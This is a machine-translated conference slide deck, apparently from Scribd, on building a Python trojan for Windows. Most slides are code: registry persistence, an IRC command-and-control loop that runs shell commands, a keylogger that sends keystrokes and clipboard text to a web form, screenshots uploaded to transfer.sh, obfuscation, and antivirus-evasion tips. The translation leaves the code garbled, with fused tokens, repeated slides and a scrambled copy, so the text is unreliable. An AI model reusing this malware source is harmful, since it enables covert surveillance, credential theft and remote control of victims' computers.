Scribd
Upload
6 views129 pages

Creating Malware With Python

The document discusses how to program malware using Python, describing three techniques: 1) modifying the Windows registry to ensure the continuous execution of the malware, 2) establishing communication between the attacker and the victim using IRC, and 3) receiving and responding to commands in the IRC channel.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views129 pages

Creating Malware With Python

The document discusses how to program malware using Python, describing three techniques: 1) modifying the Windows registry to ensure the continuous execution of the malware, 2) establishing communication between the attacker and the victim using IRC, and 3) receiving and responding to commands in the IRC channel.

Uploaded by

ScribdTranslations
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 129

Hello!

I am Yan Orestes
Content producer in

@yanorestes
1
Understanding the
operation of
a malware
using Python
2
What is a
malware?
Let's understand this concept

3
Malware
malicious software

malicious software

4
Ransomware

Worm
Virus

It's not just ...


virus! Malware
5
Which
choose?
Destructive
X Useful

6
Horse
of Troy
Giving the maximum of
possibilities for the
attacker through the
Command & Control (C&C)

7
How?

8
How? Python

9
How? Python

Why?

10
How? Python

Why?

Why not? 11
Victim

Windows (8)

12
An inefficient virus
destroys its bearer. A
smart virus stays with
she.
James Lovelock

13
Ensuring the
execution 1.
continues from
malware
14
Hiding the malware
in other programs

Easy to program Little effectiveness

15
Modifying the
Windows Registry

Effective Requires privileges of


administrator

16
Registration

Chaves

Subkeys
17
HKEY_LOCAL_MACHINE

Run
18
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft
\Windows\CurrentVersion\Run

19
How to do this in
Python?

20
How to do this in
Python?

winreg

21
How to do this in
Python?

winreg
●os

22
1.fromos.pathimportrealpath
2. from winreg import*
3.
4.file_path=realpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6.try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
8.exceptPermissionError:
9. It's not running as administrator :(
10.else:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

23
1.fromos.pathimportreal path
2.fromwinregimport*
3.
4.path_arquivo=realpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6.try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
8.exceptPermissionError:
9. It's not running as administrator :(
10. else:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

24
fromos.pathimportrealpath
2.from winreg import*
3.
4.file_pathrealpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6. try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
except PermissionError:
9. It's not running as administrator :(
10. otherwise:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

25
1.fromos.pathimportrealpath
2.from winreg import*
3.
4.file_path=realpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6.try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
8.exceptPermissionError:
9. It's not running as an administrator :(
10. else:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

26
fromos.pathimportrealpath
2.fromwinregimport*
3.
4.path_arquivo=realpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6.try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
8.exceptPermissionError:
9. It's not running as administrator :(
10.otherwise:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

27
1.fromos.pathimportrealpath
2.from winreg import*
3.
4.file_path=realpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6.try:
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
8.exceptPermissionError:
9. It's not running as an administrator :(
10.else:
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

28
How to establish
communication
between attacker and
victim?
29
Connecting to 2.
victim to
attacker
30
Direct connection between
attacker and victim

Greater control Greater vulnerability

31
Using services
externals (such as Twitter)

Easy to program Less control

32
fromos.pathimportrealpath
2.from winreg import*
3.
4.file_pathrealpath(__file__)
5.run=r'Software\Microsoft\Windows\CurrentVersion\Run'
6. try
7. key=OpenKey(HKEY_LOCAL_MACHINE,run,0,KEY_SET_VALUE)
except PermissionError
9. It's not running as administrator :(
10. otherwise
11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path)
12. key.Close()

25
IRC

34
How to do this in
Python?

35
How to do this in the
Python?

socket

36
1.importsocket
2.classAttackerConnection:
3. def__init__(self, irc_address):
4. self.socket=socket.socket()
5. self.socket.connect(irc_address)
6.
7. connection =AttackerConnection(('irc.pythonbrasil.net',6667))

37
1. importsocket
2.classAttackerConnection:
3. def__init__(self, irc_address):
4. self.socket=socket.socket()
5. self.socket.connect(irc_address)
6.
7. conexao =ConexaoAtacante(('irc.pythonbrasil.net',6667))

Is that all?

38
1. importsocket
2. importre
3. classAttackerConnection:
4. def__init__(self, irc_address, nickname): 19. defregister_user(self, nick):
5. self.socket=socket.socket() 20. self.send_command('NICK ' + nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self, msg):
9. 24. match=re.match(PING :(.*)',msg)
10. defenvia_comando(self,cmd): 25. ifmatch
11. cmd+='\r\n' 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

39
1. importsocket
2. importre
3. classAttackerConnection:
4. def__init__(self, irc_address, nick): 19. defregister_user(self, nick):
5. self.socket=socket.socket() 20. self.send_command('NICK ' + nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self, msg):
9. 24. match = re.match('PING :(.*)', msg)
10. defsend_command(self,cmd): 25. ifmatch:
11. 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

40
1. importsocket
2. importre
3. classAttackerConnection:
4. def__init__(self,address_irc,nick): 19. defregister_user(self,nick):
5. self.socket=socket.socket() 20. self.send_command('NICK ' + nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self,msg):
9. 24. match=re.match(PING :(.*)',msg)
10. defsend_command(self, cmd): 25. ifmatch
11. 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

41
1. importsocket
2. importre
3. classConnectionStriker:
4. def__init__(self, irc_address, nickname): 19. defregister_user(self, nick):
5. self.socket=socket.socket() 20. self.send_command('NICK ' + nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self,msg):
9. 24. match=re.match(PING :(.*)',msg)
10. defsend_command(self, cmd): 25. ifmatch
11. cmd+='\r\n' 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

42
1. importsocket
2. importre
3. classAttackerConnection:
4. def__init__(self, irc_address, nickname): 19. defregister_user(self, nick):
5. self.socket=socket.socket() 20. self.send_command('NICK '+nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self, msg):
9. 24. match=re.match(PING :(.*)',msg)
10. defsend_command(self, cmd): 25. ifmatch
11. cmd+='\r\n' 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

43
1. importsocket
2. importre
3. classAttackerConnection:
4. def__init__(self, irc_address, nick): 19. defregister_user(self,nick):
5. self.socket=socket.socket() 20. self.send_command('NICK ' + nick)
6. self.socket.connect(irc_address) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick))
7. self.register_user(nick) 22.
8. self.nick=nick 23. defrespond_ping(self, msg):
9. 24. match=re.match('PING :(.*)',msg)
10. defsend_command(self, cmd): 25. ifmatch
11. 26. pong=match.group(1)
12. self.socket.send(cmd.encode('utf8')) 27. self.send_command('PONG :' + pong)
13.
14. defreceive_command(self):
15. msg=self.socket.recv(4096)
16. msg=msg.decode('utf8',errors='ignore')
17. self.respond_ping(msg)
18. returnmsg

44
IURPRV
SDWK
LPSRUW
UHDOSDWK
IURPZLQUHJLPSRUW

SDWKBDUTXLYRUHDOSDWKBBILOHBB
UXQ U6RIWZDUH?0LFURVRIW?:LQGRZV?&XUUHQW9HUVLRQ?5XQ
WU\
NH\ 2SHQ.H\+.(<B/2&$/B0$&+,1(UXQ.(<B6(7B9$/8(
H[FHSW3HUPLVVLRQ(UURU
,WVQRWUXQQLQJ
DVDGPLQLVWUDWRU
RWKHUZLVH
6HW9DOXH([NH\0$/:$5(5(*B6=ILOHBSDWK
NH\&ORVH
How to take the
control of
computer of the
victim?
46
Executing
commands no 3.
computer from
victim
47
Using os.system()

A lot of simplicity Little flexibility

48
Using the subprocess module

A lot of flexibility

49
Using the subprocess module

A lot of flexibility Where?

50
51
52
1. fromsubprocessimportrun,PIPE,STDOUT
2.
3.defcommand_wheel_in_shell(cmd):
4. processo_completo=run(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
5. resposta=processo_completo.stdout.decode('utf8',errors='ignore')
6. returnanswer

53
1. fromsubprocessimportrun,PIPE,STDOUT
2.
3.defcommand_wheel_in_shell(cmd):
4. processo_completo=run(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
5. resposta=processo_completo.stdout.decode('utf8',errors='ignore')
6. returnresponse

but the communication with the


attacker?
54
1.classAttackerConnection:
2. # Code omitted
3. defparse_msg(self,msg):
4. match=re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick),msg)
5. returnmatch
6.
7. defreceive_command(self):
8. msg=self.socket.recv(4096).decode('utf8',errors='ignore')
9. self.respond_ping(msg)
10. msg_match=self.parse_msg(msg)
11. ifmsg_match:
12. returnmsg_match.groups()
13. returnNone, None
14. # Omitted code

55
1. classAttackerConnection:
2. # Omitted code
3. defparse_msg(self, msg):
4. match=re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick),msg)
5. returnmatch
6.
7. defreceive_command(self):
8. msg=self.socket.recv(4096).decode('utf8',errors='ignore')
9. self.respond_ping(msg)
10. msg_match=self.parse_msg(msg)
11. ifmsg_match:
12. returnmsg_match.groups()
13. returnNone, None
14. Code omitted

56
1. classAttackerConnection:
2. # Code omitted
3. defparse_msg(self, msg):
4. match=re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick),msg)
5. returnmatch
6.
7. defreceive_command(self):
8. msg=self.socket.recv(4096).decode('utf8',errors='ignore')
9. self.respond_ping(msg)
10. msg_match=self.parse_msg(msg)
11. ifmsg_match:
12. returnmsg_match.groups()
13. returnNone, None
14. # Code omitted

57
connection = AttackerConnection(('irc.rizon.net', 6667), 'MalwareBot')
2. comandos ={'!shell':roda_comando_no_shell}
3. re_comandos ='|'.join(comandos.keys())
4.whileTrue:
5. nick_recebido,cmd=conexao.recebe_comando()
6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd)
7. ifcmd_match:
8. cmd_type,args=cmd_match.groups()
9. resposta=comandos[cmd_tipo](args)
10. else:
11. resposta='Comando não encontrado'
12. connection.send_command('PRIVMSG {} :{}'.format(received_nick,response))

58
1. conexao =ConexaoAtacante(('irc.rizon.net',6667),'MalwareBot')
2. comandos ={'!shell':roda_comando_no_shell}
3. re_comandos ='|'.join(comandos.keys())
4.whileTrue:
5. nick_recebido,cmd=conexao.recebe_comando()
6. cmd_match=re.match('({})(?: (.*))?'.format(re_comandos),cmd)
7. ifcmd_match:
8. cmd_type,args=cmd_match.groups()
9. response=comandos[cmd_type](args)
10. else:
11. resposta='Comando não encontrado'
12. connection.send_command('PRIVMSG {} :{}'.format(received_nick, response))

59
1. connection = ConnectionAttacker(('irc.rizon.net',6667),'MalwareBot')
2. comandos ={'!shell':roda_comando_no_shell}
3. re_commands = '|'.join(commands.keys())
4.whileTrue
5. nick_recebido,cmd=conexao.recebe_comando()
6. cmd_match=re.match('({})(?: (.*))?'.format(re_comandos),cmd)
7. ifcmd_match:
8. cmd_type,args=cmd_match.groups()
9. response=comandos[cmd_type](args)
10. else:
11. resposta='Comando não encontrado'
12. connection.send_command('PRIVMSG {} :{}'.format(received_nick,response))

60
1. conexao =ConexaoAtacante(('irc.rizon.net',6667),'MalwareBot')
2. comandos ={'!shell':roda_comando_no_shell}
3. re_commands ='|'.join(commands.keys())
4.whileTrue
5. nick_received, cmd=connection.receive_command()
6. cmd_match=re.match('({})(?: (.*))?'.format(re_comandos),cmd)
7. ifcmd_match:
8. cmd_type,args=cmd_match.groups()
9. response=comandos[cmd_type](args)
10. else:
11. resposta='Comando não encontrado'
12. connection.send_command('PRIVMSG {} :{}'.format(received_nick,response))

61
1. conexao =ConexaoAtacante(('irc.rizon.net',6667),'MalwareBot')
2. comandos ={'!shell':roda_comando_no_shell}
3. re_comandos = '|'.join(comandos.keys())
4.whileTrue
5. nick_recebido,cmd=conexao.recebe_comando()
6. cmd_match = re.match('({})(?: (.*))?'.format(re_comandos), cmd)
7. ifcmd_match:
8. cmd_type,args=cmd_match.groups()
9. response=comandos[cmd_type](args)
10. else:
11. resposta='Comando não encontrado'
12. connection.send_command('PRIVMSG {} :{}'.format(received_nick, response))

62
Capturing
user data
4.
in real time

63
Capturing
keys
digitized
keylogger
64
How to do this in
Python?

65
How to do this in
Python?

keyboard
https://github.com/boppreh/keyboard

66
How to do this in
Python?

keyboard
requests
http://docs.python-requests.org/en/master
/
67
How to do this in
Python?

keyboard
requests
pyperclip
https://github.com/asweigart/pyperclip
68
1. importkeyboard
2.
3. teclas_apertadas = []
4. keyboard.on_press(lambdak:pressed_keys.append(k.name)

69
1. importkeyboard
2.
3. teclas_apertadas = []
4. keyboard.on_press(lambdak:pressed_keys.append(k.name))

Hello, world!

70
1. importkeyboard
2.
3. teclas_apertadas = []
4. keyboard.on_press(lambdak:pressed_keys.append(k.name))

Hello, world!
Hello, world!

71
1. importkeyboard
2.
3. teclas_apertadas = []
4. teclas_especiais ={'space':' ','enter':'\n'}
5.
6.defhandle_key(k):
7. ifshiftink.modifiers:
8. pressed_keys.pop()
9. tecla=k.nome
10. iflen(key)>1:
11. key=special_keys.get(key,'<< {} >>'.format(key))
12. pressed_keys.append(key)
13.
14. keyboard.on_press(handle_key)
72
1. importkeyboard
2.
3. teclas_apertadas = []
4. teclas_especiais ={'space':' ','enter':'\n'}
5.
6.defhandle_key(k):
7. if'shift' ink.modifiers:
8. keys_pressed.pop()
9. tecla=k.nome
10. iflen(key) > 1:
11. tecla=teclas_especiais.get(tecla,'<< {} >>'.format(tecla))
12. keys_pressed.append(key)
13.
14. keyboard.on_press(handle_key)
73
1.importkeyboard
2.
3. teclas_apertadas = []
4. teclas_especiais ={'space':' ','enter':'\n'}
5.
6.defhandle_key(k):
7. ifshiftink.modifiers:
8. keys_pressed.pop()
9. key=k.name
10. iflen(key) > 1:
11. key=special_keys.get(key,'<< {} >>'.format(key))
12. pressed_keys.append(key)
13.
14. keyboard.on_press(handle_key)
74
1.importkeyboard
2.
3. teclas_apertadas = []
4. teclas_especiais ={'space':' ','enter':'\n'}
5.
6.defhandle_key(k):
7. ifshiftink.modifiers:
8. keys_pressed.pop()
9. key=k.name
10. iflen(key)>1:
11. key=special_keys.get(key, '<< {} >>'.format(key))
12. pressed_keys.append(key)
13.
14. keyboard.on_press(handle_key)
75
1. importkeyboard
2.
3. teclas_apertadas = []
4. teclas_especiais ={'space':' ','enter':'\n'}
5. and how the
6.defhandle_key(k):
7. ifshiftink.modifiers: atacante
8.
9.
pressed_keys.pop()
key=k.name
access this?
10. iflen(key)>1:
11. tecla=teclas_especiais.get(tecla,'<< {} >>'.format(tecla))
12. keys_pressed.append(key)
13.
14. keyboard.on_press(handle_key)
76
1. fromrequestsimportpost
2.
3. url_form =#linkParaForm#
4.defhandle_key(k):
5.# Code omitted
6.iflen(pressed_keys) >= 100:
7. texto_digitado=''.join(teclas_apertadas)
8. pressed_keys.clear()
9. post(url_form,{'entry.1269107664':texto_digitado})

77
1. fromrequestsimportpost
2.
3. url_form =#linkParaForm#
4.deftrata_tecla(k):
5.# Code omitted
6. iflen(pressed_keys) >= 100:
7. typed_text=''.join(pressed_keys)
8. pressed_keys.clear()
9. post(url_form,{'entry.1269107664':texto_digitado})

78
1. fromrequestsimportpost
2.
3. url_form =#linkParaForm#
4.defhandle_key(k):
5.# Code omitted
6.iflen(keys_pressed) >= 100:
7. texto_digitado=''.join(teclas_apertadas)
8. pressed_keys.clear()
9. post(url_form,{'entry.1269107664':texto_digitado})

79
1.from requestsimport post
2.
3. url_form =#linkParaForm#
4.defhandle_key(k):
5.# Code omitted
6.iflen(pressed_keys) >= 100:
7. typed_text=''.join(pressed_keys)
8. keys_pressed.clear()
9. post(url_form, {'entry.1269107664': entered_text})

80
Touch of Gold

81
Gold touch
1. frompyperclipimportpaste
2.
3.defcopy_paste_handle()
4. copied_text = paste()
5. keys_pressed.extend(list(copied_text))
6.
7. keyboard.add_hotkey('ctrl+c', handle_copy_paste)
82
Capturing
the screen of
vítima
83
How to do this in
Python?

84
How to do this in
Python?

●pyscreenshot
https://github.com/ponty/pyscreensho
t

85
How to do this in
Python?

pyscreenshot
●os

86
How to do this in
Python?

●pyscreenshot
●os
requests
87
1. frompyscreenshotimportgrab to file
2.
3.deftira_screenshot(filename):
4. grab_to_file(filename)

88
1.frompyscreenshotimportgrab to file
2.
3.deftake_screenshot(filename):
4. grab_to_file(filename)
5.
6. comandos ={'!shell':roda_comando_no_shell,
'!screenshot':tira_screenshot}

89
1.frompyscreenshotimportgrab_to_file
2. and how the
3. deftira_screenshot(filename):
attacker
4. grab_to_file(filename)
access this?
5.
6. comandos ={'!shell':roda_comando_no_shell,
'!screenshot':tira_screenshot}

90
1. frompyscreenshotimportgrab_to_file
2.fromrequestsimportpost
3.
4. deftake_screenshot(filename):
5. grab_to_file(filename)
6. withopen(filename,'rb')asf:
7. r=post('https://transfer.sh',files={filename:f})
8. resposta=r.textifr.status_code==200elseUpload error
9. returnanswer

91
1. frompyscreenshotimportgrab_to_file
2.fromrequestsimportpost
3.
4.deftake_screenshot(filename):
5. grab_to_file(filename)
6. withopen(filename,'rb')asf:
7. r=post('https://transfer.sh',files={filename:f})
8. response=r.textifr.status_code==200elseUpload error
9. returnanswer

92
1. fromtheimportremove
2.frompyscreenshotimportgrab_to_file
3.fromrequestsimportpost
4.
5.deftake_screenshot(filename):
6. grab_to_file(filename)
7. withopen(filename,'rb')asf:
8. r=post('https://transfer.sh', files={filename:f})
9. response=r.textifr.status_code==200elseError in upload
10. returnanswer
11. remove(filename)

93
Extra!
94
Obfuscation of
5.
code

95
Compile to bytecode

Easy Easily recoverable

96
Using pyminifier

Fun Recoverable

97
Using pyminifier
1. pyminifier -O -o nivel1.py malware.py

98
Using pyminifier
1. pyminifier -O -o nivel1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

99
Using pyminifier
1. pyminifier -O -o level1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

100
Using pyminifier
1. pyminifier -O -o level1.py malware.py

2. pyminifier -O --nonlatin -o nivel2.py malware.py

3. pyminifier -O --nonlatin --replacement-length=100 -o nivel3.py malware.py

4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o nivel4.py


malware.py

101
Escalation
6.
of privileges

102
How to do this in
Python?

pyscreenshot
●os

86
Escalation
6.
of privileges
Brute force
Code injection

104
And how the
user can
to protect oneself?
105
Precaution
106
Control of
connections
107
Antivirus?
108
The best antivirus is the
common sense
Anonymous knower of everything

109
The best antivirus is the
common sense
Anonymous understander of everything

Really?
110
Antiviruses are
unbearable

111
Antivirus are
insuportáveis
Unexpected renewal fees

112
Antiviruses are
unbearable
Unexpected renewal fees
Problems with the system

113
Antiviruses are
unbearable
Unexpected renewal fees
Problems with the system
aaaaaaaaaaaaaaaaaaaaaaaaa
114
2010 - McAfee Case

115
2010 - McAfee Case
2011 - MSE Case

116
2010 - McAfee Case
2011 - MSE Case
2012 - Sophos Case
117
Low effectiveness
2006- 40-50%
2007 - 20-30%

118
Low effectiveness?

2006 - 40-50%
2007 - 20-30%
2013- 91.1-99.9%

119
Humans fail

120
Unless you...
Do not share files and/or links with anyone
Do not allow anyone but yourself to use your computer.
Do not use the Internet for shopping, adult entertainment, or gaming.
online
Never use a public WiFi network
Do not share your private WiFi with anyone
Never click on any ads
Use extremely secure passwords and never repeat any.
Do not use a smartphone
Do not download anything from the Internet
121
Unless you...
Do not share files and/or links with anyone.
Do not allow anyone other than you to use your computer.
Do not use the Internet for shopping, adult entertainment, or gaming
online
Never use a public WiFi network
Do not share your private WiFi with anyone
Never click on any ads
Use extremely secure passwords and never repeat any.
Do not use a smartphone
Do not download anything from the Internet
Do not use an operating system 122
Protection against
7.
antivirus

123
Protection against
7.
antivirus
● Assinatura => Código polimórfico

124
Protection against
7.
antivirus
● Signature => Polymorphic code
● Sandbox => Detecção (mouse)
https://github.com/boppreh/mouse/
125
Protection against
7.
antivirus
● Assinatura => Código polimórfico
● Sandbox => Detection (mouse)
Heuristic method => ?
126
Very
thank you!
Any questions?
Can you talk to me in
@yanorestes
[email protected]
https://speakerdeck.com/yanorestes/criando-um-malware-com-python 127
Acknowledgments
specials
Python Brazil
▪ Roosevelt Fujikawa ([email protected])
Alura/Caelum
Code House (PythonBrasil&HouseofCode)
15%

128
Design of
presentation
This presentation uses the following sources:
Titles: Work sans bold
Body: Work sans light
Code: Arial with formatting dotohtml.com
You can download the fonts on this page
https://github.com/weiweihuanghuang/Work-Sans/tree/master/fonts/desktop

Slide layouts and icons by SlidesCarnival


129

You might also like